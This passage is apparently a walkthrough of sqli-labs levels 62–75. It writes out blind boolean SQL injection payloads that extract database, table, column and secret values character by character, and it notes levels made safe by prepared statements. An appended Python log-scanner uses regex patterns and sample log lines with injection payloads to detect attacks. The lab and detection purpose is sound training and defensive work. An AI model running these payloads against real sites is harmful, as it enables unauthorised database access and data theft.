  3. blind injection: ?id=1') and ascii(substr(database(),1,1))=99 --+ echoed (challenges: c)

  4. ?id=1') and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=49 --+ character by character gives table_name=1PA6G0TRVN

  5. ?id=1') and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='1PA6G0TRVN'),1,1))=105 --+ gives: id,sessid,secret_LVJI,tryy

  6. ?id=1') and ascii(substr((select secret_LVJI from challenges.1PA6G0TRVN),1,1))=106 --+ gives: jEtrVlDZGr0Rcq1E1nd3gpmE

less-63

  1. ?id=1' is the only one with no echoed output

  2. blind injection: ?id=1' and ascii(substr(database(),1,1))=99 --+ echoed (challenges: c)

  3. ?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=88 --+ character by character gives table_name=XVCQ5S72H0

  4. ?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='XVCQ5S72H0'),1,1))=105 --+ gives: id,sessid,secret_IU8C,tryy

  5. ?id=1' and ascii(substr((select secret_IU8C from challenges.XVCQ5S72H0),1,1))=114 --+ gives: rNlAiMP1PMtH............

less-64

  1. ?id=1 and 1=1 ; ?id=1 and 1=2 output differs

  2. ?id=1 and ascii(substr(database(),1,1))=99 echoed (challenges: c)

  3. ?id=1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=88 character by character gives table_name=XVCQ5S72H0

  4. ?id=1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='XVCQ5S72H0'),1,1))=105 gives: id,sessid,secret_IU8C,tryy

  5. ?id=1 and ascii(substr((select secret_IU8C from challenges.XVCQ5S72H0),1,1))=114 gives: rNlAiMP1PMtH............

less-65

  1. ?id=1")

  2. ?id=1") and ascii(substr(database(),1,1))=99 --+ echoed (challenges: c)

less-66

  1. blank page

  2. ?id=1 shows: Array ( [username] => Dumb [0] => Dumb )

  3. ?id=1 ', ", ), '), "), )) the page does not react to any of them

  4. ?id=1 or 1=2 ; ?id=1 or 1=1 ; ?id=1 and 1=1 ; ?id=1 and 1=2 no reaction either

  5. view the source: prepare("select username from users where id=?") the query is prepared with a bound parameter, so SQL injection seems impossible

less-67

  1. an "index of" directory listing page

  2. choose part-1

    1. a login page: Username: Password: Array ( [0] =>  [@uid] =>  )

    2. Username:dumb Password:dumb Array ( [0] =>1  [@uid] =>1  )

    3. queries the user's uid...

  3. part-2 is a login page

    1. Username: Password:

    2. Username:dumb Password:dumb after submitting: Username: Password: Welcome.

    3. a wrong submission shows: Invalid password.

  4. the source code likewise uses prepared statements, so SQL injection seems impossible

less-68-75

No such page
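As an added example (not from the original post or from sqli-labs), a small log-triage script that URL-decodes each query parameter and flags the payload families this walkthrough uses: time-based, error-based, union, stacked queries, outfile writes, the wide-byte quote, the /**/ and %a0 space bypass, and base64-wrapped cookie values as in less-21/22. The log lines, family names and patterns are constructed here; they are a starting point for detection, not a complete filter.

```python
import base64
import re
from urllib.parse import unquote

# Payload families used across the levels above. Each pattern is matched against the
# lower-cased, URL-decoded parameter value; the family names are labels chosen here.
FAMILIES = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error-based": re.compile(
        r"\b(extractvalue|updatexml)\s*\(|floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "union-based": re.compile(r"\bunion\b[\s\S]*?\bselect\b"),
    "stacked-query": re.compile(r";\s*(update|insert|delete|create|drop|select)\b"),
    "file-write": re.compile(r"\binto\s+(out|dump)file\b"),
    # keyword stuffing such as infoorrmation_schema (less-26/27) still matches
    "schema-enumeration": re.compile(r"info\w*rmation_schema"),
    "blind-probe": re.compile(
        r"\b(length|ascii|substr)\s*\(|(\b(and|or)\b|&&|\|\|)\s*\(?\s*'?\d+'?\s*\)?\s*="),
}
# Checked on the raw, still URL-encoded value: a high byte directly before a quote is
# the wide-byte trick of less-32..37; /**/ and %a0 are the space bypass of less-26.
WIDE_BYTE = re.compile(r"%[89a-f][0-9a-f](?:%27|')", re.I)
SPACE_BYPASS = re.compile(r"/\*\*/|%a0|%09", re.I)

def normalize(raw):
    """URL-decode, unwrap a base64 value (the uname cookie of less-21/22), lower-case."""
    value = unquote(raw.replace("+", " "))
    if len(value) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        try:
            decoded = base64.b64decode(value, validate=True).decode("utf-8")
            if decoded.isprintable():
                value = decoded
        except (ValueError, UnicodeDecodeError):
            pass
    return value.lower()

def classify(raw):
    """Return the sorted list of payload families found in one parameter value."""
    found = set()
    if WIDE_BYTE.search(raw):
        found.add("wide-byte")
    value = normalize(raw)
    if SPACE_BYPASS.search(raw) or SPACE_BYPASS.search(value):
        found.add("space-bypass")
    for name, pattern in FAMILIES.items():
        if pattern.search(value):
            found.add(name)
    return sorted(found)

LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

def scan_log(lines):
    """Map 1-based line number -> {param: families} for requests that carry a payload."""
    hits = {}
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match or "?" not in match.group("path"):
            continue
        per_param = {}
        for pair in match.group("path").split("?", 1)[1].split("&"):
            name, _, raw = pair.partition("=")  # first "=" splits name from value
            families = classify(raw)
            if families:
                per_param[name] = families
        if per_param:
            hits[number] = per_param
    return hits

# Constructed access-log lines (not real traffic) echoing payload shapes from the levels above.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Aug/2023:13:57:01 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 1024',
    '10.0.0.5 - - [04/Aug/2023:13:57:02 +0800] "GET /Less-5/?id=1%27%20and%20if(ascii(substr(database(),1,1))=115,sleep(5),1)%20--+ HTTP/1.1" 200 880',
    '10.0.0.5 - - [04/Aug/2023:13:57:03 +0800] "GET /Less-5/?id=1%27%20union%20select%201,2,extractvalue(1,concat(0x7e,database()))%20--+ HTTP/1.1" 200 900',
    '10.0.0.5 - - [04/Aug/2023:13:57:04 +0800] "GET /Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%22/tmp/x.txt%22--+ HTTP/1.1" 200 700',
    '10.0.0.5 - - [04/Aug/2023:13:57:05 +0800] "GET /Less-26/?id=0%27/**/||/**/length(database())=%278 HTTP/1.1" 200 880',
    '10.0.0.5 - - [04/Aug/2023:13:57:06 +0800] "GET /Less-32/?id=1%df%27%20and%20length(database())=8--+ HTTP/1.1" 200 880',
]

if __name__ == "__main__":
    for number, params in scan_log(SAMPLE_LOG).items():
        print(number, params)
```

POST bodies and Cookie headers are not in the access log; feed those values to classify() directly from a request log or WAF capture.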
